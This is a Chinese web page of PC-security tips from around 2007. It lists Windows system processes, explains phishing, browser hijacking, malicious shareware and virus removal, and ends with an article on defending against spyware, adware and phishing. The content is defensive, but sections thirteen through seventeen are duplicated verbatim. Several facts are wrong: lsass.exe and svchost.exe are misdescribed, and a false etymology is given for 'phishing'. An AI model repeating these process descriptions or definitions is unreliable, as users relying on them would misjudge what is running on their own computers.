其实只要马上激活“任务管理器”,把“出错的对话框”和“正在复制”的任务都关闭掉。那么文件就会以原文件大小保存下来了,当然这还是有缺点的,当此类文件播放到断点的地方时就会停止。

巧玩游戏

本人用的是Windows XP家庭版,运行一些支持Windows 2000但不支持Windows XP的游戏时,鼠标、键盘失去反应。某日发现一解法:打开“任务管理器”,结束EXPLORER.EXE进程,点“新任务”,找到游戏运行文件,运行即可。另外,结束SVCHOST.exe(为当前用户名的)进程可以去掉Windows XP风格。

第十二:一些常见的进程


进程名描述
smss.exeSessionManager
csrss.exe 子系统服务器进程
winlogon.exe管理用户登录
services.exe包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
svchost.exe Windows 2000/XP 的文件保护系统
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。
explorer.exe资源管理器
internat.exe托盘区的拼音图标
mstask.exe允许程序在指定时间运行.
regsvc.exe允许远程注册表操作。(系统服务)→remoteregister
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。
llssrv.exe证书记录服务
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。
RsSub.exe 控制用来远程储存数据的媒体。
locator.exe 管理 RPC 名称服务数据库。
clipsrv.exe 支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页
msdtc.exe 并列事务,是分布于两个以上的数据库,消息队列,文件系统或其他事务保护资源
管理器。
grovel.exe扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存储点,以
节省磁盘空间(只对 NTFS 文件系统有用)。
snmp.exe包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。



以上这些进程都是对计算机运行起至关重要的,千万不要随意“杀掉”,否则可能直接影响系统的正常运行。

第十三:什么是网络钓鱼

什么是网络钓鱼?

网络钓鱼 (Phishing)攻击者利用欺骗性的电子邮件和伪造的 Web 站点来进行网络诈骗活动,受骗者往往会泄露自己的私人资料,如信用卡号、银行卡账户、身份证号等内容。诈骗者通常会将自己伪装成网络银行、在线零售商和信用卡公司等可信的品牌,骗取用户的私人信息。

如何防备网络钓鱼?

不要在网上留下可以证明自己身份的任何资料,包括手机号码、身份证号、银行卡号码等。

不要把自己的隐私资料通过网络传输,包括银行卡号码、身份证号、电子商务网站账户等资料不要通过QQ 、MSN 、Email 等软件传播,这些途径往往可能被黑客利用来进行诈骗。

不要相信网上流传的消息,除非得到权威途径的证明。如网络论坛、新闻组、 QQ 等往往有人发布谣言,伺机窃取用户的身份资料等。

不要在网站注册时透露自己的真实资料。例如住址、住宅电话、手机号码、自己使用的银行账户、自己经常去的消费场所等。骗子们可能利用这些资料去欺骗你的朋友。

如果涉及到金钱交易、商业合同、工作安排等重大事项,不要仅仅通过网络完成,有心计的骗子们可能通过这些途径了解用户的资料,伺机进行诈骗。

不要轻易相信通过电子邮件、网络论坛等发布的中奖信息、促销信息等,除非得到另外途径的证明。正规公司一般不会通过电子邮件给用户发送中奖信息和促销信息,而骗子们往往喜欢这样进行诈骗。

第十四:什么是浏览器劫持

浏览器劫持是一种恶意程序,通过DLL插件、BHO 、Winsock LSP 等形式 对用户的浏览器进行篡改,使用户浏览器出现 访问正常网站时被转向到恶意网页、IE浏览器主页 / 搜索页等被修改为劫持软件指定的网站地址等异常。

浏览器劫持如何防止,被劫持之后应采取什么措施?

浏览器劫持分为多种不同的方式,从最简单的修改IE默认搜索页到最复杂的通过病毒修改系统设置并设置病毒守护进程,劫持浏览器,都有人采用。针对这些情况,用户应该采取如下措施:

不要轻易浏览不良网站。

不要轻易安装共享软件、盗版软件。

建议使用安全性能比较高的浏览器,并可以针对自己的需要对浏览器的安全设置进行相应调整。

如果给浏览器安装插件,尽量从浏览器提供商的官方网站下载。

第十五:什么是恶意共享软件

恶意共享软件(malicious shareware)是指采用不正当的捆绑或不透明的方式强制安装在用户的计算机上,并且利用一些病毒常用的技术手段造成软件很难被卸载,或采用一些非法手段强制用户购买的免费、共享软件。 安装共享软件时,应注意以下方面: 注意仔  细阅读软件提供的“安装协议”,不要随便点“next”进行安装。

不要安装从不良渠道获得的盗版软件,这些软件往往由于破解不完全,安装之后带来安全风险。

使用具有破坏性功能的软件,如硬盘整理、分区软件等,一定要仔细了解它的功能之后再使用,避免因误操作产生不可挽回的损失。

第十六:如何更好地预防计算机病毒入侵

有病治病,无病预防这是人们对健康生活的最基本也是最重要的要求,预防比治疗更为重要。对计算机来说,同样也是如此,了解病毒,针对病毒养成一个良好的计算机应用管理习惯,对保障您的计算机不受计算机病毒侵扰是尤为重要的。为了减少病毒的侵扰,建议大家平时能做到“三打三防”。

“三打” 就是安装新的计算机系统时,要注意打系统补丁,震荡波一类的恶性蠕虫病毒一般都是通过系统漏洞传播的,打好补丁就可以防止此类病毒感染;用户上网的时候要打开杀毒软件实时监控,以免病毒通过网络进入自己的电脑;玩网络游戏时要打开个人防火墙,防火墙可以隔绝病毒跟外界的联系,防止木马病毒盗窃资料。


“三防” 就是防邮件病毒,用户收到邮件时首先要进行病毒扫描,不要随意打开电子邮件里携带的附件;防木马病毒,木马病毒一般是通过恶意网站散播,用户从网上下载任何文件后,一定要先进行病毒扫描再运行;防恶意“好友”,现在很多木马病毒可以通过 MSN、 QQ等即时通信软件或电子邮件传播,一旦你的在线好友感染病毒,那么所有好友将会遭到病毒的入侵。

第十七:如何干净地清除病毒

1、在安全模式或纯DOS模式下清除病毒

当计算机感染病毒的时候,绝大多数的感染病毒的处理可以在正常模式下彻底清除病毒,这里说的正常模式准确的说法应该是实模式(Real Mode),这里通俗点说了。其包括正常模式的 Windows 和正常模式的 Windows 下的“MS-DOS 方式” 或 " 命令提示符”。但有些病毒由于使用了更加隐匿和狡猾的手段往往会对杀毒软件进行攻击甚至是删除系统中的杀毒软件的做法,针对这样的病毒绝大多数的杀毒软件都被设计为在安全模式可安装、使用、执行杀毒处理。

在安全模式(Safe Mode)或者纯DOS下进行清除清除时,对于现在大多数流行的病毒,如蠕虫病毒、木马程序和网页代码病毒等,都可以在安全模示下清除。DOS下杀毒(建议用干净软盘启动杀毒)。而且,当计算机原来就感染了病毒,那就更需要在安装反病毒软件后(升级到最新的病毒库),在安全模式(Safe Mode)或者纯DOS下清除一遍病毒了!

第十三:什么是网络钓鱼

什么是网络钓鱼?

网络钓鱼 (Phishing)攻击者利用欺骗性的电子邮件和伪造的 Web 站点来进行网络诈骗活动,受骗者往往会泄露自己的私人资料,如信用卡号、银行卡账户、身份证号等内容。诈骗者通常会将自己伪装成网络银行、在线零售商和信用卡公司等可信的品牌,骗取用户的私人信息。

如何防备网络钓鱼?

不要在网上留下可以证明自己身份的任何资料,包括手机号码、身份证号、银行卡号码等。

不要把自己的隐私资料通过网络传输,包括银行卡号码、身份证号、电子商务网站账户等资料不要通过QQ 、MSN 、Email 等软件传播,这些途径往往可能被黑客利用来进行诈骗。

不要相信网上流传的消息,除非得到权威途径的证明。如网络论坛、新闻组、 QQ 等往往有人发布谣言,伺机窃取用户的身份资料等。

不要在网站注册时透露自己的真实资料。例如住址、住宅电话、手机号码、自己使用的银行账户、自己经常去的消费场所等。骗子们可能利用这些资料去欺骗你的朋友。

如果涉及到金钱交易、商业合同、工作安排等重大事项,不要仅仅通过网络完成,有心计的骗子们可能通过这些途径了解用户的资料,伺机进行诈骗。

不要轻易相信通过电子邮件、网络论坛等发布的中奖信息、促销信息等,除非得到另外途径的证明。正规公司一般不会通过电子邮件给用户发送中奖信息和促销信息,而骗子们往往喜欢这样进行诈骗。

第十四:什么是浏览器劫持

浏览器劫持是一种恶意程序,通过DLL插件、BHO 、Winsock LSP 等形式 对用户的浏览器进行篡改,使用户浏览器出现 访问正常网站时被转向到恶意网页、IE浏览器主页 / 搜索页等被修改为劫持软件指定的网站地址等异常。

浏览器劫持如何防止,被劫持之后应采取什么措施?

浏览器劫持分为多种不同的方式,从最简单的修改IE默认搜索页到最复杂的通过病毒修改系统设置并设置病毒守护进程,劫持浏览器,都有人采用。针对这些情况,用户应该采取如下措施:

不要轻易浏览不良网站。

不要轻易安装共享软件、盗版软件。

建议使用安全性能比较高的浏览器,并可以针对自己的需要对浏览器的安全设置进行相应调整。

如果给浏览器安装插件,尽量从浏览器提供商的官方网站下载。

第十五:什么是恶意共享软件

恶意共享软件(malicious shareware)是指采用不正当的捆绑或不透明的方式强制安装在用户的计算机上,并且利用一些病毒常用的技术手段造成软件很难被卸载,或采用一些非法手段强制用户购买的免费、共享软件。 安装共享软件时,应注意以下方面: 注意仔  细阅读软件提供的“安装协议”,不要随便点“next”进行安装。

不要安装从不良渠道获得的盗版软件,这些软件往往由于破解不完全,安装之后带来安全风险。

使用具有破坏性功能的软件,如硬盘整理、分区软件等,一定要仔细了解它的功能之后再使用,避免因误操作产生不可挽回的损失。

第十六:如何更好地预防计算机病毒入侵

有病治病,无病预防这是人们对健康生活的最基本也是最重要的要求,预防比治疗更为重要。对计算机来说,同样也是如此,了解病毒,针对病毒养成一个良好的计算机应用管理习惯,对保障您的计算机不受计算机病毒侵扰是尤为重要的。为了减少病毒的侵扰,建议大家平时能做到“三打三防”。

“三打” 就是安装新的计算机系统时,要注意打系统补丁,震荡波一类的恶性蠕虫病毒一般都是通过系统漏洞传播的,打好补丁就可以防止此类病毒感染;用户上网的时候要打开杀毒软件实时监控,以免病毒通过网络进入自己的电脑;玩网络游戏时要打开个人防火墙,防火墙可以隔绝病毒跟外界的联系,防止木马病毒盗窃资料。

“三防” 就是防邮件病毒,用户收到邮件时首先要进行病毒扫描,不要随意打开电子邮件里携带的附件;防木马病毒,木马病毒一般是通过恶意网站散播,用户从网上下载任何文件后,一定要先进行病毒扫描再运行;防恶意“好友”,现在很多木马病毒可以通过 MSN、 QQ等即时通信软件或电子邮件传播,一旦你的在线好友感染病毒,那么所有好友将会遭到病毒的入侵。

第十七:如何干净地清除病毒

1、在安全模式或纯DOS模式下清除病毒

当计算机感染病毒的时候,绝大多数的感染病毒的处理可以在正常模式下彻底清除病毒,这里说的正常模式准确的说法应该是实模式(Real Mode),这里通俗点说了。其包括正常模式的 Windows 和正常模式的 Windows 下的“MS-DOS 方式” 或 " 命令提示符”。但有些病毒由于使用了更加隐匿和狡猾的手段往往会对杀毒软件进行攻击甚至是删除系统中的杀毒软件的做法,针对这样的病毒绝大多数的杀毒软件都被设计为在安全模式可安装、使用、执行杀毒处理。

在安全模式(Safe Mode)或者纯DOS下进行清除清除时,对于现在大多数流行的病毒,如蠕虫病毒、木马程序和网页代码病毒等,都可以在安全模示下清除。DOS下杀毒(建议用干净软盘启动杀毒)。而且,当计算机原来就感染了病毒,那就更需要在安装反病毒软件后(升级到最新的病毒库),在安全模式(Safe Mode)或者纯DOS下清除一遍病毒了!

推荐日志 只防病毒并不安全 安全攻略全解

[ 2007-03-25 03:48:14 | 作者: sun ]

上网的人中,很少有谁没被病毒侵害过。但在大多数人将注意力放在对付病毒上时,业内权威人士新近指出,现在要想保证上网安全,必须对以下这三种威胁同时设防。第一是以传统宏病毒、蠕虫等为代表的入侵性病毒;第二是以间谍软件、广告软件、网络钓鱼软件、木马程序为代表的扩展类威胁;第三是以黑客为首的有目标的专门攻击或无目标的随意攻击为代表的网络侵害。

三大新威胁

Spyware(间谍软件):主要是用作偷取用户个人资料的恶意程序,如用户使用网上银行、网上购物等电子商务应用时,如果没有相关的防御措施与意识,那么用户的网银账号和密码就很容易被窃取。

Adware(广告软件):是一种软件,一般表现为用户点击网站后就一连出现好多叠加着的网页,非常不好关。它通常都跟某些工具软件绑在一起,当你安装这些软件后,也就跟着进入你的电脑了。它不但占用系统资源,还常常连着一些色情网站。除强行向用户做广告外,更会刺探用户的个人隐私资料,例如姓名、邮箱、银行资料、电话、地址等,因此隐藏着不小的危害性,需要尽快清除。

Phishing(网络钓鱼软件,又称电子黑饵):是fishing和phone的缩写。是指盗取他人个人资料、银行及财务账户资料的网络相关诱骗行为,可分为诱骗式及技术式两种。诱骗式是利用特制的电邮,引导收件人连接到特制的网页,这些网页通常会伪装成真正的银行或理财网页,令登录者信以为真,输入信用卡或银行卡号码、账户名称及密码等;技术性的Phishing则是将程序安装到受害者的电脑中,直接盗取个人资料或使用木马程序、按键记录程序等。

只防病毒不安全

信息产业部发布的最新统计数据显示,目前中国互联网上网人数已达9880万。目前众多网民已不再是简单地上网浏览网页及收发电邮,随着网上银行、网上购物等电子商务应用的出现,来自网上的威胁不仅仅是传统的病毒了。

有报道称,中国目前已经成黑客首选的攻击目标,每天有3万台PC机处于随时可能被攻击的失控状态。业内人士指出,未来对电脑及电脑用户造成最大威胁的并不是我们惯常认为的电脑病毒(Virus),而是一些Spyware(间谍软件)、Adware(广告软件)、Phishing(网络钓鱼软件)、Trojan(木马程序)、Worms(蠕虫)。原因是大部分用户及商业机构对一般的电脑病毒已有一定的防范,譬如安装防毒程序等,再新的病毒也能在短时间内被解决,可是对于Spyware、Trojan及Worms绝大多数网民防范意识较为薄弱。虽然一般的电脑上也安装了防毒程序,但实际上单一的防毒程序并不能阻挡来自网上的侵袭。数码周刊在此向大家介绍如何架构一个缜密的“三防”电脑防御系统,以保证上网安全。

害人四大新趋势

Symantec中国区技术总监Robert在接受记者采访时表示,总体来说,以前的黑客攻击和犯罪的目的性不很明确,他们大多出于好奇、出风头的目的。而现在多是有组织、有目的的经济犯罪。据我们分析,黑客的攻击大致有如下四大趋势:

1.盗取个人资料

近年来利用Phishing攻击的犯罪增长非常快,主要出现在电子商务应用中。黑客假借银行之名给银行用户发电子邮件,提示银行系统升级要求用户重新注册,用户一旦轻信进行注册,银行账号即落入黑客掌中,与此伴随的将是你的银行存款不翼而飞。

2.“僵尸”入侵

据Symantec今年3月份公布的安全报告显示,去年7月—12月,从全球来看,僵尸即机器人(BOT)程序在中国的增长最快,而整个亚太区也居于全球前十名。BOT类似于木马程序,它执行的是预先没有设置好的程序,通过所有被程序控制的“僵尸”电脑一同对某一目标发起攻击。这种攻击的危险性最大,因为它不像病毒可以提前监控。

3.Adware、Spyware偷袭

Symantec的技术中心曾在用户送修的笔记本电脑中发现,其已经被植入了多达近百种的Adware或Spyware软件。它们一般通过小的用户在下载Flash和小游戏时安装,由于它们不像病毒和蠕虫那么敏感,于是得以在不知不觉中入侵你的电脑。现在一些正规的软件厂商也在应用这些软件来搜集用户的资料。尽管目前这类软件不见得都有害,但它们搜集的毕竟是你的个人隐私信息。这也将成为未来防范的重点。


4.垃圾邮件改头换面

从当前来看,垃圾邮件的总量虽然呈下降态势,但其逃避技术却越来越强。这类邮件中携带着大量的病毒、Phishing、蠕虫、木马及额外的风险。

三防靠六招

人们常常认为,只要安装一些单纯的网络防御产品就等于构建了一个完备的电脑防御系统。殊不知,这些还不足以构建起一个完善的网络整体防御体系,还需要在网络安全管理标准的指导下,通过网络安全管理整体解决方案,结合各种不同的网络防御技术和产品,在整体上维护网络和信息系统的安全。

1.基本防(杀)毒软件不可少

对于一般用户而言,首先要做的就是为电脑安装一套杀毒软件。只要是正规厂商的正版杀毒软件,任选一套即可。安装的步骤很简单,只要将安装盘放入光驱,按照系统的自动安装界面的提示选择安装**杀毒软件→选择安装的语言版本→再一路NEXT即可。

2.个人防火墙设定是关键

在上述防病毒软件中都含有个人防火墙,所以可用同一张光盘运行个人防火墙安装,重点提示防火墙在安装后一定要根据需求进行详细配置。

各种防火墙的设置技巧有一定的共通之处,那就是在选择将目前上网中的“区域连线 ”→“设定值”的“服务”中的大部分连接协议剔除,只保留基本的HTTP、HTTPS、SMTP、POP3项目能够通过防火墙,按下确定后你的电脑就能防范大部分的蠕虫入侵了。

3.斩断Phishing鱼钩

反网络钓鱼组织APWG(Anti-PhishingWorkingGroup)最新统计指出,约有70.8%的网络欺诈是针对金融机构而来。从国内前几年的情况看大多Phishing只是被用来骗取QQ密码与游戏点卡与装备,但今年国内的众多银行已经多次被Phishing过了。可以下载一些工具来防范Phishing活动。

4.反间谍、广告软件必杀

要防范Spyware的话,除了需要在电脑上安装有如防毒程序的反间程序,时常监察及清除电脑的Spyware外。还要对将要在计算机上安装的共享软件进行甄别选择,尤其是那些你并不熟悉的,可以登录其官方网站了解详情。此外,在安装共享软件时,不要总是心不在焉地一路单击“OK”按钮,而应仔细阅读各个步骤出现的协议条款,特别留意那些有关Spyware行为的语句。

Adware和其他恶意程序相近,它们中简单的会出现在控制面板的添加或删除程序里,用户可直接把它们移除。不过大部分Adware为了掩人耳目都不会直接显示程序本体,要删除它们就需要利用一些针对性的软件。

5.自建网站黑名单

清除了广告程序后,并不代表已存在浏览器内的问题会自动被还原,还需要用户手动重新更改标题及首页。虽然《SpybotSearch&Destory》也有相近的功能,但使用起来却没有一款叫《SpywareBlaster》的软件方便。通过该软件用户可以先对有问题的网站做出预防,限制他们对电脑安装程序,并能清除目前已经安装的有害ActiveX控件。建议与上述软件同时安装。另外,用户若要防备有问题的网站对电脑安装不明软件,同样可使用《SpywareBlaster》来解决。

6.训练软件认垃圾

相信拥有电子邮箱的用户都受到过不同程度的垃圾邮件(SPAM)骚扰,令人不胜其烦,特别是每每长假过后邮箱被塞爆之虞。为此,用户要做的就是安装一款电邮过滤程序,把SPAM过滤掉。